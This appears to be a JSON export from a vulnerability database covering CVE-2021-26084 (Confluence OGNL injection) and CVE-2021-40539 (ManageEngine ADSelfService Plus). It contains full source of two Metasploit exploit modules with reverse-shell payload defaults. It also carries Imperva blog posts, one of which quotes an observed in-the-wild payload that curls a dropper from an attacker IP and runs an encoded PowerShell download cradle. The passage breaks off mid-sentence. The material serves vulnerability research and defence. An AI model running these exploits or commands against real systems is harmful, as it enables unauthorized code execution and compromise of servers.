7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-30T13:29:00", "cpe": [], "id": "CVE-2021-26084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "metasploit": [{"lastseen": "2021-12-14T04:38:03", "description": "This module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T01:05:09", "type": "metasploit", "title": "ManageEngine ADSelfService Plus CVE-2021-40539", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T16:44:59", "id": "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539/", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:40:42", "description": "This module exploits an OGNL injection in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n", "cvss3": {}, "published": "2021-10-14T21:58:04", "type": "metasploit", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-14T21:58:04", "id": "MSF:EXPLOIT/MULTI/HTTP/ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_webwork_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Module::Deprecated\n\n # Added Windows support\n moved_from 'exploit/linux/http/atlassian_confluence_webwork_ognl_injection'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n when :psh\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n #{target_shell},\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\n def target_shell\n target['Platform'] == 'win' ? '\"cmd.exe\",\"/c\"' : '\"/bin/sh\",\"-c\"'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_webwork_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2021-04-22T20:29:34", "description": "In [Part 1](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>) of this series, we explained how and why our software supply chain transfers an extraordinary amount of risk downstream to the organizations and users that trust and depend on it. We also presented evidence suggesting that 2021 may well be the year of the [Software Supply Chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>).\n\nLast time we described the most sophisticated of the supply chain attack methods, a [Vendor Compromise](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>). In this post, we cover the exploitation of third-party applications.\n\n### Exploitation of Third Party Applications\n\nAttacks targeting &quot;[zero-days](<https://www.imperva.com/learn/application-security/zero-day-exploit/>),&quot; or unpatched security bugs, in commonly used third-party applications are another example of the risks we assume from our software supply chain.\n\nCreating software is a challenging process. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn\u2019t intended to do like steal other users\u2019 credentials or read the entire contents of a database.\n\nThe [recent attacks on the Microsoft Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell. A web shell is typically an additional web page that the attacker uploads to a website. If the attacker can modify a web page on the server, the web shell may be embedded in an existing page. The additional or modified page contains code that allows the attacker to run arbitrary Operating System commands on the webserver, read files in the filesystem, install malware, etc. A web shell offers capabilities similar to a backdoor without having to establish an additional network connection to the webserver.\n\nCompounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Employing a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) to reduce the gap is a common strategy. Even the best WAFs require time to adapt, however, either with a new signature update (that must be developed, tested, and deployed) or with an adjustment to a machine learning model, or manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these \u201cvirtual patches\u201d must be tested in each organizations\u2019 environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nThe race to mitigate zero-day attacks through traditional means is increasingly difficult to win. For example, a Zoho ManageEngine Desktop Server zero-day vulnerability [was broadly exploited within days](<https://www.tenable.com/blog/cve-2020-10189-deserialization-vulnerability-in-zoho-manageengine-desktop-central-10-patched>) of its public disclosure.\n\n### Imperva RASP\n\nImperva [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a compelling way forward. Delivered as a lightweight software plugin, RASP attaches to virtually any type of application whether a third party, open-source or bespoke. Tightly coupled with the application and requiring no external connectivity, RASP protections are consistently applied regardless of where the application is deployed today or in the future. Using a positive security approach, RASP mitigates risk from supply chain attacks by neutralizing malicious software activity including unauthorized network calls, file system access, and execution of commands on the underlying host operating system.\n\nPerhaps this is why the National Institute of Standards and Technology recommends the use of RASP in Special Publication 800-53, section SI-7(17), [Security and Privacy Controls for Information Systems and Organizations](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf>)?\n\nSee [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) for yourself.\n\nThe post [5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-22T12:28:49", "type": "impervablog", "title": "5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-04-22T12:28:49", "id": "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "href": "https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-29T14:37:27", "description": "Ransomware may have dominated headlines in 2021, but it\u2019s only one of many threats security teams must protect against. We\u2019re taking a look back at 5 top cybersecurity stories of 2021 that practitioners wanted to learn more about.\n\n## [5\\. The State of Security in eCommerce](<https://www.imperva.com/blog/by-the-numbers-the-state-of-security-in-ecommerce/>)\n\n### Why you should learn more about this\n\nThe global pandemic has pushed more consumers online and forced the acceleration of growth in eCommerce. The threat landscape for eCommerce websites has never been larger or more complex, with bad bot traffic being the principal problem, accounting for 57% of all attacks on online retail websites in 2021. In addition to stopping ordinary eCommerce transactions, about a third of attacks on web applications on retail websites resulted in data leakage. And with 83% of retail websites running third-party JavaScript-based services executing on the client-side, application developers are creating blind spots in securing the services they need to protect.\n\n### What can eCommerce enterprises do?\n\nIn addition to [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>), security practitioners may also consider [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) that provides visibility into JavaScript services executing on a website at any given moment. This solution automatically scans for existing and newly added services, eliminating the risk of them being a blind spot for security. Client-Side Protection enables you to allow approved domains while blocking unapproved ones and ensures your customers\u2019 sensitive information doesn\u2019t end up being transferred to unauthorized locations and that no fraudsters are exploiting your visitors.\n\n## [4\\. How Imperva Is Protecting Customers &amp; Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why you should learn more about this\n\nCVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### What can security practitioners do?\n\n[Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a defense-in-depth strategy for enterprises to protect their applications and APIs on a broad front. Many Imperva customers that have deployed RASP have saved thousands of hours in emergency patching and made their secure software development lifecycle faster. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\n## [3\\. The ad blocker that injects ads](<https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/>)\n\n### Why you should learn more about this\n\nAd injection is the process of inserting unauthorized advertisements into a publisher\u2019s web page with the intention of enticing the user to click on them. Ad injectors are often made by scammers trying to make money from application downloads. They can generate revenue for their creators by serving ads and stealing advertising impressions from other websites. With many people spending more time browsing the web, deceptive ad injection is a growing concern. Attackers are constantly refining their tactics, techniques, and procedures.\n\n### What can security practitioners do?\n\nMalicious JavaScript files, including ad injection scripts, are still widespread on the Internet despite worldwide efforts among security practitioners to make the web safer. Imperva [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) enables customers to block such malicious JavaScript threats. The solution provides security teams with visibility and insights into the JavaScript-based services running on their websites, as well as the ability to block unwanted services from executing.\n\n## [2\\. Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>)\n\n### Why you should learn more about this\n\nRemote Code Execution (RCE) vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\n\n### What can security practitioners do?\n\nWith [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), security practitioners can see a CVEs activity in Imperva Attack Analytics. Also, Given the nature of how [Imperva Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs can be stopped without requiring any code changes or policy updates. Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected when RASP is actively deployed.\n\n## [1\\. 5 elements to include in a cybersecurity strategy for any size business](<https://www.imperva.com/blog/5-elements-to-include-in-a-cybersecurity-strategy-for-any-size-business/>)\n\n### Why you should learn more about this\n\nCybercriminals don\u2019t care how big your business is. If there is a way to separate you from your data or put a wrench in the works of your web applications by launching an automated attack, they will figure out a way to do that. If not directly through your site, then through the software supply chain or through your website visitors. Today, you shouldn\u2019t depend on your developers to build water-tight web application code, your ISP to protect you from a DDoS attack, or your compliance audit checkbox to protect you from a data breach. The threat landscape has progressed far beyond these notions.\n\n### What can security practitioners do?\n\nWe strongly recommend working with [cybersecurity experts](<https://www.imperva.com/contact-us/>) to accurately evaluate your specific threat landscape and help you build a sustainable data security strategy for today and the future.\n\nThe post [2021 in Review, Part 2: 5 Top Cybersecurity Stories](<https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T12:03:19", "type": "impervablog", "title": "2021 in Review, Part 2: 5 Top Cybersecurity Stories", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-29T12:03:19", "id": "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "href": "https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T20:35:04", "description": "## Vulnerability Overview\n\nOn August 25, 2021 [a security advisory was released](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) for a vulnerability identified in Confluence Server titled \u201cCVE-2021-26084: Atlassian Confluence OGNL Injection\u201d.\n\nThe vulnerability allows an unauthenticated attacker to perform remote command execution by taking advantage of an insecure handling of OGNL (Object-Graph Navigation Language) on affected Confluence servers.\n\nSoon after the publication, various POC/Exploits were published online - at the time of writing this blog there are 32 Github repositories available for CVE-2021-26084.\n\nBesides the publicly available exploits (attempts at executing them were already detected on our systems), Imperva security researchers were able to identify attackers\u2019 attempts to exploit this vulnerability in order to install and run the XMRig cryptocurrency miner on affected Confluence servers running on Windows and Linux systems.\n\n## Analysis\n\n### Attacker Methodology\n\nAs mentioned above we were able to detect payloads targeting Windows and Linux Confluence servers.\n\nIn both cases, the attacker is using the same methodology in exploiting a vulnerable Confluence Server.\n\n * Attacker determines the target operating system and downloads Linux Shell/Windows Powershell dropper scripts from a remote C&amp;C server, and writes them into a writable location on the affected system (under /tmp on Linux and $env:TMP system variable on Windows).\n * Executing downloaded dropper scripts.\n * Dropper Scripts perform the following actions to download, install and execute the XMRig crypto mining files: \n * Removal of competing crypto mining processes and their related files.\n * Establishing persistence by adding a crontab/scheduled task based on the operating system.\n * Download of the XMRig crypto mining files and post-exploitation clean up scripts. The files are written to temporary locations, masked as legitimate services/executables.\n * Starting XMRig mining.\n * Execution of post-exploitation scripts.\n\n### Downloaded Dropper Scripts\n\nThe following malicious payload was observed on our monitoring systems: \nqueryString=aaaaaaaa&#x27;+{Class.forName(&#x27;javax.script.ScriptEngineManager&#x27;) .newInstance().getEngineByName(&#x27;JavaScript&#x27;).eval(&#x27;var isWin = \njava.lang.System.getProperty(&quot;os.name&quot;).toLowerCase().contains(&quot;win&quot;); \nvar cmd = new java.lang.String(&quot;curl -fsSL \nhxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg&quot;);var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command(&quot;cmd.exe&quot;, &quot;/c&quot;, cmd); \n} else{p.command(&quot;bash&quot;, &quot;-c&quot;, cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); \nvar bufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = &quot;&quot;; var output = &quot;&quot;; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}&#x27;)}+&#x27;\n\nFrom the sample above we see the attacker is attempting to determine the vulnerable server operating system by calling java.lang.System.getProperty(&quot;os.name&quot;):\n\nOnce the operating system is determined, a file is downloaded from a remote source by either using curl as can be seen in the example above or by powershell:\n\nDownload of a Linux Shell dropper script: \nvar cmd = new java.lang.String(&quot;**curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg**&quot;);\n\nDownload of a Windows Powershell dropper script: \nvar cmd = new java.lang.String(**&quot;powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC \n4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo \nACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw \nBzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA==&quot;**);\n\nThe powershell payload is base64 encoded, thus decoded into the following code which downloads the sys.ps1 file: \nIEX (New-Object 